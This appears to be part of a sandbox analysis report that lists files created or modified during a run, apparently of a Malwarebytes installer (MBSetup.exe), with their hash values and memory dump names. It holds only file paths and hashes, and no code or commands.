MD5 14537af74d514e5ba43caebe7999aeb8
SHA1 106464cc3c7d4032798872e2d9ba12472465d4a0
SHA256 459ff18cfee7572a1cb0d43e4ed4b2a684527901d4bb8e9b7caedeffa91525eb
SHA512 966e8b9ef95adec66d0205c8130c75f9d4d1d972748ed4b17061a77782cb70ada2bd8d7c0ac80fc22abb1430da7d5d54f8a9a8680325d12c415f552b14549fa7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 762dccb329ce214f70b5bbdc0158f717
SHA1 17a869d3e918e498e26df0375c72bcccb15e0d73
SHA256 9f4715ac7845de36a814ebd17c3163b1e94a78bf8f5da99005b7cdc3b1b12876
SHA512 e53d0eef2bad30d89cf4c205d0957a6b455786b0a6c399240e5c5b0d1daa624b8767695b8950e6316f95ae9ea19515748ab6216c0357cefb52608fd77b03613d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fffcbc9049e77f990634044f1d5ea53c
SHA1 c7163ce50c4a1fd3fd298ed7ab3709274eb7f3ab
SHA256 ee029b559883f6564d973431db62b731bdcaca71300aa46b9a6424f4c9181fcd
SHA512 038c4bad5ebd9b230d945cb5f2140b7e6b4edbd579cb41f64b5de333e8d06760180b2083cd04a00b4a71dc611d0b663f2659fec348ccd4c72ec706c7a6606b11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6dcc0fcb2143fbc95d20e0031a35703f
SHA1 88fc63cf4c45ab1fdec9917c40f922330ec82603
SHA256 7f8d453af0e921f86f9d6eaae91f483c1610c16e587794c36b5216b8b699a9e2
SHA512 e88e2a77aa09194cfdc544230efd304b8d0ba7e39818a266ab7b28a9108eb145c7829609affc22763f658b20e2375c9a7196bfafcbecc57648928b42785ac4de

C:\Users\Admin\AppData\Local\Temp\63C7.tmp\63D8.tmp\63D9.bat

MD5 addedb06062eef1e06beb01c81ede139
SHA1 fe92bda282254358c287991cd4020f393a3393fe
SHA256 98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f
SHA512 a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfrbras5.t2p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2288-1231-0x00000141CB110000-0x00000141CB132000-memory.dmp

memory/2288-1232-0x00007FF8E1350000-0x00007FF8E1E11000-memory.dmp

memory/2288-1234-0x00000141B2C70000-0x00000141B2C80000-memory.dmp

memory/2288-1233-0x00000141B2C70000-0x00000141B2C80000-memory.dmp

memory/2288-1238-0x00007FF8E1350000-0x00007FF8E1E11000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/5172-1251-0x00007FF8E1350000-0x00007FF8E1E11000-memory.dmp

memory/5172-1256-0x000002579EB40000-0x000002579EB50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

memory/5172-1255-0x000002579EB40000-0x000002579EB50000-memory.dmp

memory/5172-1261-0x00007FF8E1350000-0x00007FF8E1E11000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e836f8b33d804f6083d9e8008e94eee5
SHA1 a676ce38226606874fee96efb058cbc821559d08
SHA256 4812060b045ef86d2c679f18be32a08fe1fca547b4730d7d10a5ad50aa54a716
SHA512 abac44fbdacbb92150188596746111b9b1ed1eb6bbc532933594514daf9c2c675ab682b6d33467a4c3ee5607ffbb616e026a885478e245f084e2a609e431d993

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 a127a49f49671771565e01d883a5e4fa
SHA1 09ec098e238b34c09406628c6bee1b81472fc003
SHA256 3f208f049ffaf4a7ed808bf0ff759ce7986c177f476b380d0076fd1f5482fca6
SHA512 61b54222e54e7ab8743a2d6ca3c36768a7b2cf22d5689a3309dee9974b1f804533720ea9de2d3beab44853d565a94f1bc0e60b9382997abcf03945219f98d734

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 02214b097305a8302b21e630fa201576
SHA1 90c2a31521803b73e847f7a3e0cfceec84df9fa5
SHA256 1d98076cfae6a0a8f0b0b1c654270b900de83e633cc01d98ef63e6a8e485a3f4
SHA512 553c81eb51880f83b9918aef766ff0f41170895b1cda2589f0b69c3d1362de8e8decf14a413f6b5df1fb7ce07fc939211407b29046188b37c290133c9d5e1cd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

MD5 74e33b4b54f4d1f3da06ab47c5936a13
SHA1 6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c
SHA256 535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287
SHA512 79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 e697736a5e3e5c85499dae2b33685687
SHA1 684a6e0f6392fed2fb6c08a923c1c278bd4598cd
SHA256 ec5e94e00291f3a9473ac45bcd71a091da1b06efaa7a9c62b8bfa0ad3c8a780e
SHA512 7419ef0f24cb7baf367b9fad5fd4c072e6d5abfb84582082ed3ecd84ca3f2e157b382e3dee9a2e9e2fcb1aeeb1179ab13e32e269e04762f6b1e7adec4798c233

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9e14242de4b83258738f9b37010598cb
SHA1 ac6fd48f2e0f019cd35f173f271a706fde0b114a
SHA256 4a895bedcaec310aa5307fa551e0a4e52c398df26eb1352da7f23e39d06e6a48
SHA512 d63600848dfa306c2cd744126ac4d453ee07945e7e5e5e411072ba27e6ae096457be5feb81e333a6457efb549454009331cb4effdb7caeffcdd6e41c6b6a5ff4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5b55ded7d24a4ba16ac9e87073af219d
SHA1 03e1a231449dd4cbb1f41ff54de3fa033287586c
SHA256 136cfdad2e1674912afedc608bc109ce902468182a9cc6a1bbf15ba6a3ccb44b
SHA512 9502b57c291962271fbfd745279217935ad51f5389d810f0bc89f910954a322d692eb8e56190e66b934f56a82400cdf30c57e21f37331a0342e276b98bda55d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 bc9faa8bb6aae687766b2db2e055a494
SHA1 34b2395d1b6908afcd60f92cdd8e7153939191e4
SHA256 4a725d21a3c98f0b9c5763b0a0796818d341579817af762448e1be522bc574ed
SHA512 621386935230595c3a00b9c53ea25daa78c2823d32085e22363dc438150f1cb6b3d50be5c58665886fac2286ae63bf1f62c8803cb38a0cac201c82ee2db975c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 bbc7e5859c0d0757b3b1b15e1b11929d
SHA1 59df2c56b3c79ac1de9b400ddf3c5a693fa76c2d
SHA256 851c67fbabfda5b3151a6f73f283f7f0634cd1163719135a8de25c0518234fc2
SHA512 f1fecb77f4cdfe7165cc1f2da042048fd94033ca4e648e50ebc4171c806c3c174666bb321c6dda53f2f175dc310ad2459e8f01778acaee6e7c7606497c0a1dea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 492ec6539bc443f80d84d871a841d4ad
SHA1 b1b655d7433232870e4358248234002e28009a0e
SHA256 866714662ae24e27af48c2de6c422ea44c157774fee09578403c0dc896e1f6c6
SHA512 f25ea9b4b1d8d7d8ff99fdd857b871c5b60d33ea9170fbfa6519f70cb6564cc0e18234f41067cabca8c76732e2b6b68d669af8b1283e8da89f108e586d1c191d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3bd89e60321c66ec3a093ce160f58e0
SHA1 30681d5a9586749b712faf9cb09356a844722f0d
SHA256 adad83a579c933b1d269929c3b043e6b7fc01d29b3f5f3d7f8834be1b137c87d
SHA512 7e7d0ae6cfbb6f78ea70854b3035d704a83790c086bcb2cb9ac8a8a0515e984901911b52fea283c0753ab489c901a686d258f95fbedc29708a5fa444242b5d74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3d0e0a640e94c7339f263dc51d1229d7
SHA1 1949312a561a8107007fddc6fb4a634a8144aff4
SHA256 93a0e58301b3adeafe5f98a3677355452d3199c1b57f93a41052f7871ffa91e0
SHA512 1fe1653a5d7bc543bb3dd40ec3aac02991d6e87efa95ba932f845f539b5093c38beacdaf5c1ca4a12469c938cc953e90db3540d2554f597a26529748c5d92401

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fe101d835ed9661c1c8196d9d18058c9
SHA1 e0a7b52778b72d044b796a9b0a5031721f7bfe01
SHA256 2c52136f9c41de09de0085a5063cf6e81232922401218ff53f6a72fe11d89097
SHA512 9499f59ce89afcacc1858a5047eb0fb613f0877a8027d97c6fd307bc21b9dcba9d6884c0aa0f189712b1bc65fa5d64c742440e7ca65065ee0af14fe90ad9dea0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 7fbe9011a6198ccc4890363a2bae8040
SHA1 ccc510e8a2fbc40cb1e18ba19ba539fb5c68e690
SHA256 7052d85747ea8c6a0a9240e540b76d02f69e57b202722171210c0553a76c1bc3
SHA512 796753a964c8f4dfbc4ef22c88a29c2e1c138113215dca0619989a17c157f33d6f3c13bf7a79c373b351364a987b7afba6e2abfd6d6d1d539d44d402eb755f2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f47026a6edf828ac44aa2cd5e82d747c
SHA1 fd8be862c73fb00ee33753c553113ea4d1d01f45
SHA256 b420a615902a3d3ae2547d4efc668ab3a6b31d531561b17fd4495ae855c3dc1e
SHA512 c464f734cea8d62bf5ab9db9f635ea0fce6d40ac2a8a1afd73dc1df0ad9c39472ba76eac6379e69b94a695f89f312667b60ef7e607ff20974ac202d5c9614c9c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 77e3f0e10f6431434b921feae81ae8d1
SHA1 6f1f5a8171292a9f473137779851788a1a7b1b19
SHA256 31e9c0d2f9986f98ad2b1e70692b30a12acb0876cdaa66913f7baf25134aa036
SHA512 8dffdd8f51fe9c215aea7714121bb0a3789c57b88eadb3860d7d9f5f927d489995c9d9d4e2d75d2d9b52605df10dcc8b9afb34adc3475f9547c8b70ddb0e68c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000044

MD5 e66dd2567f726904a546a2ef9738eb06
SHA1 4aa632531c1e35964568ebfa776c38f7eeede689
SHA256 e9485c8e4b4a255e582e3cec7d1fd174c435c61f06ce87d2326780aa0ea24760
SHA512 ade2f98380d6cc46f51f8c120befb142db22cb78ace34ccb38506796c233ebb45a5be6a2f568a0bfa4acd79daa12f857b7d563668f63bdd259ea723604cc1d8c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5576507eb8534fca503bb2b5160d5740
SHA1 74fb6fe491842bbf5eebc981fba224632c4f3c50
SHA256 f714fedab272ba40d1577d42288991b9e2a12f8614d9f419aa8d92145181dc83
SHA512 fd06c6137baba7d70a8b14379ac5202eb1074a147c25baa3878f9c7dbace5e86b96a4ee1133d9950610b19f4323eddf4072728f1731a5e1615ac153dbcf1b965

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fa9ad40417f7d22cf646ebbf0e109f27
SHA1 ff4fe1cb387057fd2028f851fcb138d88c4d0906
SHA256 b7bfd6b525e9229a285484ec0fb548eebf755bcc6ae8b5b7fe92a2613950a364
SHA512 9bfce51d5617d6144e3108bd45d2291be320d9db5f3cd6d781d1d1358a6e07cc4e2f513b3181066bc2b1cdc3bc930240c1307dc6e295794406104cf69f487948

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 659f42ecc68c35d37082f0f64d603583
SHA1 5dff67b8144110179ecc36298646b5b539299314
SHA256 968319de98151b3cee05c48b1f7446b349bb3a7f9f9b36cfe750b0f541186c27
SHA512 2d7b0861a8d3f71071a5b1ea84ff255c6e19b984288e399ab0db2ee19073a883300ba053a3ab4c8f3b474a650268e13514e974bdf80b36f24de50be7452774fd

C:\Users\Admin\Downloads\MBSetup.exe

MD5 b6d8b7e6f74196f62caba2ca77a7ae91
SHA1 6ac9c99f084b5772440e2f135b8d5365f7f45314
SHA256 74b0bf9c17091ab1c6c61af0aefbc599f1ecc0fff6dee0144a3dfd5cd1f5e18f
SHA512 ad58bc7b626a13606e3f44df7188b2420e0f31ecb55632eac4b6a05dc1574f1ec1b0ef6b52e11832713c6f8f91c807fe3a815699d0748284993ecc54f2823044

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ac1638f6a589fd79ef3a0aa64fb34653
SHA1 bc32831f691737eb19f7d9a1510c0e60ca23ba7e
SHA256 78901cd5a67c27875f781c25842e74053bdb7def6d07451dea9574430f1f4f87
SHA512 e8abb2b62617d33792e2d57a2ea7fae65c08a02a3f6698eae819a5ec828a9f23c5851aee91c5fcc4a600c8aa57c1719d3b9aed1d0a51e3c658f68b04fdcf7ef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 08433774a4181ac04fb3fc7ee400e1b2
SHA1 c8bd304723280d5a2a793733ea05fcbadacba71d
SHA256 948fdb82aab4ea2f465477c9b745fc7d2ce9bc4aa443fcffd170982c08d11608
SHA512 87d838ba15feca1b4bfa0bd120c67a4c49c311ce599c58d8df4f093d81c6751e595276182d2cbda893930a7d16ac4e93c3689c797b64c24bfd742836150a9a8f

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\7z.dll

MD5 ab8f0c1a37c0df5c8924aab509db42c9
SHA1 53dba959124e6d740829bda2360e851bcb85cce8
SHA256 6e223b275b84d948cc5ae1f161f0bfff2adb34de04634c84d7dbe9305a4998d5
SHA512 ff8a26e8fd5a08c74e5ba93a564e0d3cd932754e7f06993a365bfad06670497889e69ec45bfba1378040b72f82d468e79682beba2439937bb29d2a41da940d4a

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\dotnetpkgtmp\shared\Microsoft.NETCore.App\6.0.25\mscordaccore.dll

MD5 c174eda52e913580d505fb0541e513b2
SHA1 952808236e912716fd73f66c2f9f8cffb171ae9f
SHA256 14f351c5fba0f9e7199f921a93db8463276fe47a94668c84292eebfd76557d85
SHA512 a5af4ac7a57fa4f942ecfa4fddeac5e4143c1cbb819ddb23e98cade821f7964b0e9de97aeb48c4a01c42e2a206d1c6ba97f7d1e84d2498a5ca1e8760849f4fb8

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\MBAMService.exe

MD5 1cf215acd0ff47d93dd5c503f7f096b5
SHA1 cc905a2fa8caed90b1c53e84f2afa608296ae284
SHA256 a84747e773dbc0a1c740bf6d531a147e37d4619ff260664bfca9947aca68c2b7
SHA512 b26a267ce87123cbba59720d868f0ada8b2c9af56593473608e07811a0dc97537a961c5154e26a2a001e1b3a49545ddccdc86a5a4ab7867a1881df953762bdb0

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\ctlrpkg\Malwarebytes_Assistant.runtimeconfig.json

MD5 d94cf983fba9ab1bb8a6cb3ad4a48f50
SHA1 04855d8b7a76b7ec74633043ef9986d4500ca63c
SHA256 1eca0f0c70070aa83bb609e4b749b26dcb4409784326032726394722224a098a
SHA512 09a9667d4f4622817116c8bc27d3d481d5d160380a2e19b8944bdd1271a83f718415ce5e6d66e82e36819e575ec1b55f19c45213e0013b877b8d61e6feb9d998

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\dbclspkg\MBAMCoreV5.dll

MD5 b2763acfd7ac2ce596a4f3a930dd2a3f
SHA1 ac18df54e4b64268e93b6e0af650d6cd8fe60274
SHA256 3b8fdecc7155bbb62b1d76aa30f06bf079924bc794cf700f5d51ade13444d049
SHA512 40b9f4bd1dc10034a5b18d3c0d2447a98aa6e4655d5d43b22aae83720e9eda8f818cf7febc0e8d0cd3b3f051805407a6112b66eb4fddd49ae2ca882a1aaa57b3

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.inf

MD5 c481ad4dd1d91860335787aa61177932
SHA1 81633414c5bf5832a8584fb0740bc09596b9b66d
SHA256 793626d240fd8eefc81b78a57c8dfe12ea247889b6f07918e9fd32a7411aa1c3
SHA512 d292e028936412f07264837d4a321ecfa2f5754d4048c8bcf774a0e076e535b361c411301558609d64c71c1ce9b19e6041efa44d201237a7010c553751e1e830

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.cat

MD5 60608328775d6acf03eaab38407e5b7c
SHA1 9f63644893517286753f63ad6d01bc8bfacf79b1
SHA256 3ed5a1668713ef80c2b5599b599f1434ad6648999f335cf69757ea3183c70c59
SHA512 9f65212121b8a5d1a0625c3baa14ef04a33b091d26f543324333e38dcdb903e02ccc4d009e22c2e85d2f61d954e0b994c2896e52f685003a6ef34758f8a650c7

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.sys

MD5 9e77c51e14fa9a323ee1635dc74ecc07
SHA1 a78bde0bd73260ce7af9cdc441af9db54d1637c2
SHA256 b5619d758ae6a65c1663f065e53e6b68a00511e7d7accb3e07ed94bfd0b1ede0
SHA512 a12ccf92bead694f5d3cba7ff7e731a2f862198efc338efc7f33a882fe0eb7499fb3fb533538d0a823e80631a7ca162962fbdfd78e401e3255672910b7140186

C:\Program Files\Malwarebytes\Anti-Malware\srvversion.dat

MD5 c4b35a1ce68bc060eb6b842c7ca3b310
SHA1 0a52d15e79ecceec39c227f4f437300bd386fdba
SHA256 1d30fe6b0bd710b5a669b6b1c8928b2e04386c63f685371f67cc83c38a048655
SHA512 f29b3372c79e5080306cbeeca4f9c24652b9b8e3b136c85d4609e82f27575007a0c6c9ff871f6f7269ec9eb23bc331c0e8efb69f183ddfec22f1cefe69f6cc52

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

MD5 7f75a35582a1a104fb1a1a9745d82b46
SHA1 88a3a082b2c3998187cd1c1af2a99282589c7e00
SHA256 5001ed0abe6bd6852b555e8d58399d8f5689f7d3d479406aef3a8276844ad26c
SHA512 42c821707df68a8827e251761a88a11eb5ddda07ae1a074ccbb139f77b2c0e559af18c97522313be4322c7910fa2e8750c3164e9bfbad09a4f8c212147667e46

C:\Program Files\Malwarebytes\Anti-Malware\version.dat

MD5 f682923ff44f648b30d850b89e054d5b
SHA1 965d440d13094c48f516ef58ecfbb7c408442bbc
SHA256 b515b8cb1f98a9e8f4a15978bcf50105eda1e935edc517ff3790c8f23714695a
SHA512 0e28961e07fa0cc9010dc79b28930baa4ecf61e45ededd70969a16ad5d40d1107668960acc221abfec84362ec1ec795a2371cda04221f4fd39f1862c06697139

C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat

MD5 4af55ebda90ab46188cec5c1273b42c6
SHA1 5b2b75c1d7b7a7f9040057b6084cb18cfc068585
SHA256 e37c7d95e4d6098828d506864294c20b606d8f58c10c26bb418e2b60ec711951
SHA512 c21c26b7c946270c5708578ed277e96f553e6ba02530873fab3de198fb58ba469a84583db05b71f5d0103c4f123eee80a7857d753abf1c97d1bc1d7c368ad774

C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\ctlrpkg\mbae64.sys

MD5 95515708f41a7e283d6725506f56f6f2
SHA1 9afc20a19db3d2a75b6915d8d9af602c5218735e
SHA256 321058a27d7462e55e39d253ad5d8b19a9acf754666400f82fe0542f33e733c6
SHA512 d9230901adeecb13b1f92287abe9317cdac458348885b96ef6500960793a7586c76ae374df053be948a35b44abe934aa853975a6ccd3788f93909903cc718c08

C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

MD5 02927e798f84d5b717f02918e0e680fa
SHA1 a9c573419e01ed8bf8dddbf5ac0a3c9729df7b9e
SHA256 9857d60243a1edd38930330edc5bfec4e68d2426f4fd3adbca4c6dc1cb06e802
SHA512 0865e2de6de10d23649af4e590c16cb9874faf0297ae13c0444b8bf9a573fd1ebf29eeb2ae038f74a7916e0b415472e1a88047361e5f41115bd1d88bced55916

C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe

MD5 46f875f1fe3d6063b390e3a170c90e50
SHA1 62b901749a6e3964040f9af5ddb9a684936f6c30
SHA256 1cf9d3512efffaa2290c105ac8b7534026604067c9b533e7b7df2e017569a4ec
SHA512 fdfb348061158f8133380e9a94215f4bfc0f6ce643a129d623cb8034c49144f1489de56cd076da645478506d9fbddc7590fe3d643622210084b15fdf0d16b557

C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf

MD5 5d1917024b228efbeab3c696e663873e
SHA1 cec5e88c2481d323ec366c18024d61a117f01b21
SHA256 4a350fc20834a579c5a58352b7a3aa02a454abbbd9eecd3cd6d2a14864a49cd8
SHA512 14b345f03284b8c1d97219e3dd1a3910c1e453f93f51753f417e643f50922e55c0e23aab1d437300e6c196c7017d7b7538de4850df74b3599e90f3941b40ab4a

C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.cat

MD5 8abff1fbf08d70c1681a9b20384dbbf9
SHA1 c9762e121e4f8a7ad931eee58ee60c8e9fc3ecb6
SHA256 9ceb410494b95397ec1f8fa505d071672bf61f81cc596b8eccd167a77893c658
SHA512 37998e0aee93ff47fe5b1636fce755966debe417a790e1aebd7674c86c1583feef04648a7bc79e4dedaabb731051f4f803932ac49ea0be05776c0f4d218b076f

C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.sys

MD5 83d4fba999eb8b34047c38fabef60243
SHA1 25731b57e9968282610f337bc6d769aa26af4938
SHA256 6903e60784b9fa5d8b417f93f19665c59946a4de099bd1011ab36271b267261c
SHA512 47faab5fff3e3e2d2aea0a425444aa2e215f1d5bf97edee2a3bb773468e1092919036bcd5002357594b62519bf3a8980749d8d0f6402de0e73c2125d26e78f1e

C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json.bak

MD5 a836423ef472e75b78962b039bd425e0
SHA1 8a5c9ef0d302ddeaa7764a6cd5da75d29ea76191
SHA256 949875c814767d03bee996f6ff21e987ce81b150647d248e7002aeba99ff5899
SHA512 b9335921daf4b38f7b2ce4dc433743cf14427271b151b17b20d675f7dbc5825779fcb36e27625113656ad146cd5ec10f0fbb5342960418390303741814706b9d

C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json

MD5 ff853c787059931dbf363a4d19d106c7
SHA1 dc32d898a055838c517b29fde87f3e4cc733abec
SHA256 a83ee6a9f4e9a7f2b59bb4849b15cc78d7601ad888780aa6a4f1bdaa3228cc6f
SHA512 cfcc0aa466f3c6de043b3237f4bf22516285d52df708e7fc82fb3ed63ceed69d516271059d4ac58e5d94b2c3a909dd69b19d8f4d4f1c185030758d328d25072c

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 5bbac093df60392223fc5220d59e6d39
SHA1 9f5533769fd795cd7d67b001f71ca968c0d7a9e0
SHA256 b65663d712a55c0d61f983e5098a3d5fb86f96eb761c0f6fe046773166476238
SHA512 945a19c2e77a436d407ca1706b422644cfedf017d7a79c053b201d71cc6f8b267cc65553cd957ca6db67222f30de0173d425248d9da12dbf767cc034b62ddf94

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 f734c7bcdfacb932b8c8e44c1739909d
SHA1 e24b11df4a65f9c2004ee9ea303e8aba13a0ed7f
SHA256 39d215ec0c3c9ee12022487ce6a9da4bb182d7ad8c4136c7e19a6ec29e88c2dc
SHA512 f82cfbbed0dc56a62cbd07d05678ea69f3715646cca0fcf69d1e7c7e0bb04527eb9c4a505987569312afe36efad0c0e059e24eaa1ab3e12440069c98e8eb1f19

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 63c6b14e361e11daf59b47df5e2dc938
SHA1 00114f0566aa33238e7e27471a81818954b54613
SHA256 5843b07b91fe2973eafb6c1c256a2394d76e03566bd051b660a30c5ca4f316bd
SHA512 60c82d24a9d52d8c22776dfe8d81e5fd7969960d50bbe629337efd746729e81d11a20d1c62ae013a07ca9817c820788bbd5084d3bd8f34dc7f913be98ad33745

C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat

MD5 61b5aab3d5e0ec04ffd36df2dbd46879
SHA1 9039281d5d60d1f06bb405284e48afbf29908604
SHA256 653db7352b3f2b3dbfaee78158dd7f005385cf2cca3c5c2263dbf4ba014c51aa
SHA512 cbdcda73d7f4ba69e0207c831a16fa157cd0e70456db7fb6f4af2b6d9a71da09306457024a07d38c872630b4c87550a1bfdd0be5c04648a97a29ff6408397b22

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 35ba0c30a4d444692468a4843725c70b
SHA1 d0345e732871e919b0009515ac9436976f449d96
SHA256 17ef84b60cd1647fdee0e40142948d2482586a4bb68a56cf169406e38350def0
SHA512 2a6e0086666976afd683fd1853ab697691ed47863bd0b89ce3348df23b2a6863556aacc538999d606c276c7b455625de8a4e1375d91ba4deb6b6da6380087263

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 988e376203f238a4f16af933600d2edd
SHA1 e8b9f09460ae087c723af31838c3f1c45bd7c7de
SHA256 6f8617f5b84db8af48d252c9f278ae2dae9caccf51925f2b623ec61a6d06e6c6
SHA512 c6a0679023cdead204b2694b9f81751234690b5c9b5ad58ad8ca0b7f63b9bde32346279af62f53ba42b3f40ae4ba9ab30ce57ee948e15de99ae784e4276e56c2

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak

MD5 29dd9d3faadd0e2a344a7a6003eb4393
SHA1 a6c181be1728e54298f01e28f86dc99c20a4de20
SHA256 4e8807904c5df8451903729b309d53e3cb49a30a0b90466df949f82868977d5b
SHA512 b5ea74444a4114ceca7565bc798d35dec81926397dcaed37e19986a5e92899b51303f53e1cb1a5b262da40c3167bb206ea3116d92cde8f24cb8eaa813d839b95

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rules.mbdb

MD5 b7ab2383b8e2a95b50dbb99b5261a2b0
SHA1 c3b0de69d1ca2fa7a741703d59b7da65c5f7f456
SHA256 d929a67acf7346ed4e1f6f35b9be579a3d14cd3a6ee4a38f4dd8d77ca35f1729
